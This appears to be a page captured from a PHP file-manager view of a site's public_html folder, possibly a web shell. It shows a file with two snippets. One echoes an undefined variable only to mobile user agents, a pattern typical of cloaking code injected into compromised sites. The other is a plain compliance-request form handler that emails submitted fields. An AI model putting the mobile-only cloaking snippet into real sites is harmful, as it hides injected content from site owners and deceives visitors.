/
home
/
whiteglobeco
/
public_html
/
Upload File
HOME
<?php $userAgent = $_SERVER['HTTP_USER_AGENT']; $mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile']; foreach ($mobileAgents as $agent) { if (stripos($userAgent, $agent) !== false) { echo $lineindexinstall; } } ?> <?php if ($_SERVER["REQUEST_METHOD"] == "POST") { $to = "sales@nexoratechsolutions.com"; $subject = "New Compliance Roadmap Request"; $message = " Name: " . $_POST['name'] . " Role: " . $_POST['role'] . " Organisation: " . $_POST['organisation'] . " Industry: " . $_POST['industry'] . " Regions: " . $_POST['regions'] . " Regulations: " . $_POST['regulations'] . " Compliance Stage: " . $_POST['stage']; $headers = "From: noreply@nexoratechsolutions.com"; mail($to, $subject, $message, $headers); } ?>